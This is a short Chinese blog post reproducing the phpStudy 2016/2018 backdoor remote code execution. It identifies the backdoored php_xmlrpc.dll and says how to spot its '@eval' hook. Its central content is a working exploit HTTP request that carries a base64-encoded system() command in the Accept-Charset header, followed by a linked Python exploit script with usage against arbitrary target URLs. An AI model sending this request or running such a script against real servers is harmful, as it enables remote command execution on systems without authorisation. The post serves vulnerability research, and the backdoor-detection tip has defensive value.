首页 漏洞 正文

phpStudy后门RCE复现

FishM4n 2019-10-11 PM 1500℃ 0条

phpStudy后门RCE复现

0x00 影响版本
phpstudy 2016版PHP5.4存在后门。
phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门
点击下载后门版

0x01 后门文件
后门文件路径:phpStudyPHPTutorialphpphp-5.4.45extphp_xmlrpc.dll
phpstudy2.jpg
编辑器打开php_xmlrpc.dll文件搜索“@eval”字样判断有无后门
phpstudy3.jpg
0x02 复现
EXP如下:

POST /index.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCJjYWxjIik7 此处填写的是要执行的命令base64加密

phpstudy1.jpg
Accept-Encoding和Accept-Charset这两个必须要有

附上python验证脚本点击我下载
使用格式:python phpstudy.py whoami http://xxxx.com/
phpstudy.jpg

标签: PhpStudy

非特殊说明,本博所有文章均为博主原创。

上一篇 CVE-2019-0708漏洞复现
下一篇 Apache Solr Velocity模板远程代码执行复现

评论啦~


栏目分类

博主动态 ~

  • 2020年8月7号,好长时间没动态了,冒个泡(●'◡'●)2020年08月07日 23:07:45

标签云

SolrCVE-2017-7921技术分享CVE-2019-17558FlinktypechofofacsHikvisionCVE-2019-0708PhpStudyMetasploit-msfCobalt StrikeSSV-98101NmapjsApache渗透工具

友情链接申请

宁采陈的博客 IT老五 Bzero's Blog
© 2021 FishM4n Poweed by Typecho Theme by Echo